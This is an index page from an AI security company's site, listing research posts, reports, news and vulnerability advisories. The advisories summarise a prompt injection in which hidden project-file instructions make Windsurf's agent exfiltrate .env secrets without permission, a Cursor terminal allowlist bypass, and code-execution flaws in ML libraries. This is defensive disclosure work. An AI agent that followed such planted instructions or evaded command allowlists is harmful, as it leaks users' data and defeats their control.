Innovation Hub

Featured Posts

Insights
xx
min read

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights
xx
min read

Securing AI Agents: The Questions That Actually Matter

Insights
xx
min read

The Hidden Risk of Agentic AI: What Happens Beyond the Prompt

Get all our Latest Research & Insights

Explore our glossary to get clear, practical definitions of the terms shaping AI security, governance, and risk management.

Research

Research
xx
min read

AI Agents in Production: Security Lessons from Recent Incidents

Research
xx
min read

LiteLLM Supply Chain Attack

Research
xx
min read

Exploring the Security Risks of AI Assistants like OpenClaw

Research
xx
min read

Agentic ShadowLogic

Videos

Report and Guides

Report and Guide
xx
min read

2026 AI Threat Landscape Report

Register today to receive your copy of the report on March 18th and secure your seat for the accompanying webinar on April 8th.

Report and Guide
xx
min read

Securing AI: The Technology Playbook

A practical playbook for securing, governing, and scaling AI applications for Tech companies.

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

A practical playbook for securing, governing, and scaling AI systems in financial services.

HiddenLayer AI Security Research Advisory

CVE-2026-3071

Flair Vulnerability Report

An arbitrary code execution vulnerability exists in the LanguageModel class due to unsafe deserialization in the load_language_model method. Specifically, the method invokes torch.load() with the weights_only parameter set to False, which causes PyTorch to rely on Python’s pickle module for object deserialization.

CVE-2025-62354

Allowlist Bypass in Run Terminal Tool Allows Arbitrary Code Execution During Autorun Mode

When in autorun mode, Cursor checks commands sent to run in the terminal to see if a command has been specifically allowed. The function that checks the command has a bypass to its logic allowing an attacker to craft a command that will execute non-allowed commands.

CVE-2025-62353

Path Traversal in File Tools Allowing Arbitrary Filesystem Access

A path traversal vulnerability exists within Windsurf’s codebase_search and write_to_file tools. These tools do not properly validate input paths, enabling access to files outside the intended project directory, which can provide attackers a way to read from and write to arbitrary locations on the target user’s filesystem.

SAI-ADV-2025-012

Data Exfiltration from Tool-Assisted Setup

Windsurf’s automated tools can execute instructions contained within project files without asking for user permission. This means an attacker can hide instructions within a project file to read and extract sensitive data from project files (such as a .env file) and insert it into web requests for the purposes of exfiltration.

In the News

News
XX
min read
HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

News
XX
min read
HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

News
XX
min read
HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

Insights
xx
min read

Reflections on RSAC 2026: Moving Beyond Messaging and Sponsored Lists to Measurable AI Security

Insights
xx
min read

Securing AI Agents: The Questions That Actually Matter

Insights
xx
min read

The Hidden Risk of Agentic AI: What Happens Beyond the Prompt

Insights
xx
min read

Why Autonomous AI Is the Next Great Attack Surface

Insights
xx
min read

Model Intelligence

Bringing Transparency to Third-Party AI Models

Insights
xx
min read

Introducing Workflow-Aligned Modules in the HiddenLayer AI Security Platform

Modern AI environments don’t fail because of a single vulnerability. They fail when security can’t keep pace with how AI is actually built, deployed, and operated. That’s why our latest platform update represents more than a UI refresh. It’s a structural evolution of how AI security is delivered.

Insights
xx
min read

Inside HiddenLayer’s Research Team: The Experts Securing the Future of AI

Every new AI model expands what’s possible and what’s vulnerable. Protecting these systems requires more than traditional cybersecurity. It demands expertise in how AI itself can be manipulated, misled, or attacked. Adversarial manipulation, data poisoning, and model theft represent new attack surfaces that traditional cybersecurity isn’t equipped to defend.

Insights
xx
min read

Why Traditional Cybersecurity Won’t “Fix” AI

When an AI system misbehaves, from leaking sensitive data to producing manipulated outputs, the instinct across the industry is to reach for familiar tools: patch the issue, run another red team, test more edge cases.

Insights
xx
min read

Securing AI Through Patented Innovation

As AI systems power critical decisions and customer experiences, the risks they introduce must be addressed. From prompt injection attacks to adversarial manipulation and supply chain threats, AI applications face vulnerabilities that traditional cybersecurity can’t defend against. HiddenLayer was built to solve this problem, and today, we hold one of the world’s strongest intellectual property portfolios in AI security.

Insights
xx
min read

AI Discovery in Development Environments

AI is reshaping how organizations build and deliver software. From customer-facing applications to internal agents that automate workflows, AI is being woven into the code we develop and deploy in the cloud. But as the pace of adoption accelerates, most organizations lack visibility into what exactly is inside the AI systems they are building.

Insights
xx
min read

Integrating AI Security into the SDLC

AI and ML systems are expanding the software attack surface in new and evolving ways, through model theft, adversarial evasion, prompt injection, data poisoning, and unsafe model artifacts. These risks can’t be fully addressed by traditional application security alone. They require AI-specific defenses integrated directly into the Software Development Lifecycle (SDLC).

Insights
xx
min read

Top 5 AI Threat Vectors in 2025

AI is powering the next generation of innovation. Whether driving automation, enhancing customer experiences, or enabling real-time decision-making, it has become inseparable from core business operations. However, as the value of AI systems grows, so does the incentive to exploit them.

Webinars

Offensive and Defensive Security for Agentic AI

Webinars

How to Build Secure Agents

Webinars

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

Webinars

HiddenLayer Webinar: 2024 AI Threat Landscape Report

Webinars

HiddenLayer Model Scanner

Webinars

HiddenLayer Webinar: A Guide to AI Red Teaming

Webinars

HiddenLayer Webinar: Accelerating Your Customer's AI Adoption

Webinars

HiddenLayer: AI Detection Response for GenAI

Webinars

HiddenLayer Webinar: Women Leading Cyber

No items found.
Report and Guide
xx
min read

2026 AI Threat Landscape Report

Report and Guide
xx
min read

Securing AI: The Technology Playbook

Report and Guide
xx
min read

Securing AI: The Financial Services Playbook

Report and Guide
xx
min read

AI Threat Landscape Report 2025

Report and Guide
xx
min read

HiddenLayer Named a Cool Vendor in AI Security

Report and Guide
xx
min read

A Step-By-Step Guide for CISOS

Report and Guide
xx
min read

AI Threat landscape Report 2024

Report and Guide
xx
min read

HiddenLayer and Intel eBook

Report and Guide
xx
min read

Forrester Opportunity Snapshot

Report and Guide
xx
min read

Gartner® Report: 3 Steps to Operationalize an Agentic AI Code of Conduct for Healthcare CIOs

news
xx
min read

HiddenLayer Unveils New Agentic Runtime Security Capabilities for Securing Autonomous AI Execution

news
xx
min read

HiddenLayer Releases the 2026 AI Threat Landscape Report, Spotlighting the Rise of Agentic AI and the Expanding Attack Surface of Autonomous Systems

news
xx
min read

HiddenLayer’s Malcolm Harkins Inducted into the CSO Hall of Fame

news
xx
min read

HiddenLayer Selected as Awardee on $151B Missile Defense Agency SHIELD IDIQ Supporting the Golden Dome Initiative

news
xx
min read

HiddenLayer Announces AWS GenAI Integrations, AI Attack Simulation Launch, and Platform Enhancements to Secure Bedrock and AgentCore Deployments

news
xx
min read

HiddenLayer Joins Databricks’ Data Intelligence Platform for Cybersecurity

news
xx
min read

HiddenLayer Appoints Chelsea Strong as Chief Revenue Officer to Accelerate Global Growth and Customer Expansion

news
xx
min read

HiddenLayer Listed in AWS “ICMP” for the US Federal Government

news
xx
min read

New TokenBreak Attack Bypasses AI Moderation with Single-Character Text Changes

news
xx
min read

Beating the AI Game, Ripple, Numerology, Darcula, Special Guests from Hidden Layer… – Malcolm Harkins, Kasimir Schulz – SWN #471

news
xx
min read

All Major Gen-AI Models Vulnerable to ‘Policy Puppetry’ Prompt Injection Attack

news
xx
min read

One Prompt Can Bypass Every Major LLM’s Safeguards

SAI Security Advisory

Unsafe Deserialization in DeepSpeed utility function when loading the model file

If a user attempts to convert distributed checkpoints into a single consolidated file using DeepSpeed, a pytorch file with the naming convention *_optim_states.pt is used. This pytorch file returns a state which specifies the model state file, also located in the directory. This can contain a maliciously crafted data.pkl file, which, when deserialized as part of this process, may lead to arbitrary code being executed on the system.

SAI Security Advisory

keras.models.load_model when scanning .pb files leads to arbitrary code execution

If a user scans a malicious keras model in the protobuf format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside of the Keras model will run, executing arbitrary code.

SAI Security Advisory

keras.models.load_model when scanning .h5 files leads to arbitrary code execution

If a user scans a malicious keras model in the H5 format with Bosch AI Shield’s Watchtower vulnerability scanning tool, the arbitrary code inside of the Keras model will run, executing arbitrary code.

SAI Security Advisory

Unsafe extraction of NeMo archive leading to arbitrary file write

An attacker can craft a malicious model containing a path traversal and share it with a victim. If the victim uses an Nvidia NeMo version prior to r2.0.0rc0 and loads the malicious model, arbitrary files may be written to disk. This can result in code execution and data tampering.

SAI Security Advisory

Eval on XML parameters allows arbitrary code execution when loading RAIL file

An attacker can craft an XML file with Python code contained within a ‘validators’ attribute. This code must be wrapped in braces to work, i.e. `{Python_code}`. This can then be passed to a victim user as a Guardrails file, and upon loading it, the Python code contained within the braces is passed into an eval function, which will execute the Python code contained within.

SAI Security Advisory

Web UI renders javascript code in ML Engine name leading to XSS

An attacker authenticated to a MindsDB instance can create an ML Engine, database, project, or upload a dataset within the UI and give it a name (or value in the dataset) containing javascript code that will render when the items are enumerated within the UI.

SAI Security Advisory

Pickle Load on inhouse BYOM model finetune leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘finetune’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

SAI Security Advisory

Pickle Load on inhouse BYOM model describe query leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘describe’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse.’

SAI Security Advisory

Pickle Load on inhouse BYOM model prediction leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the ‘inhouse’ Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via the ‘predict’ method, executing the arbitrary code on the server. Note this can only occur if the BYOM engine is changed in the config from the default ‘venv’ to ‘inhouse’.

SAI Security Advisory

Pickle Load on BYOM model load leads to arbitrary code execution

An attacker authenticated to a MindsDB instance can inject a malicious pickle object containing arbitrary code into a model during the Bring Your Own Model (BYOM) training and build process. This object will be deserialized when the model is loaded via a ‘predict’ or ‘describe’ query, executing the arbitrary code on the server.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration list item creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a list item, where the value given for the ‘fields’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

SAI Security Advisory

Eval on query parameters allows arbitrary code execution in SharePoint integration site column creation

An attacker authenticated to a MindsDB instance with the SharePoint integration installed can execute arbitrary Python code on the server. This can be achieved by creating a database built with the SharePoint engine and running an ‘INSERT’ query against it to create a site column, where the value given for the ‘text’ parameter would contain the code to be executed. This code is passed to an eval function used for parsing valid Python data types from arbitrary user input but will run the arbitrary code contained within the query.

Stay Ahead of AI Security Risks

Get research-driven insights, emerging threat analysis, and practical guidance on securing AI systems—delivered to your inbox.

By submitting this form, you agree to HiddenLayer's Terms of Use and acknowledge our Privacy Statement.

Thanks for your message!

We will reach back to you as soon as possible.

Oops! Something went wrong while submitting the form.